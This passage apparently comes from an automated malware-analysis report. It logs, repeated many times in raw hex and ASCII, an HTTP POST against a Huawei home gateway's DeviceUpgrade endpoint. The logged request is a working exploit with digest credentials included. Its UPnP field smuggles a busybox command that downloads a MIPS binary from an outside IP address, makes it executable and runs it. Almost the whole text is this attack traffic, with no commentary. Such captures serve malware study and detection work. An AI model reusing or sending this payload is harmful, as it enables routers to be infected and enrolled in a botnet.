s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo 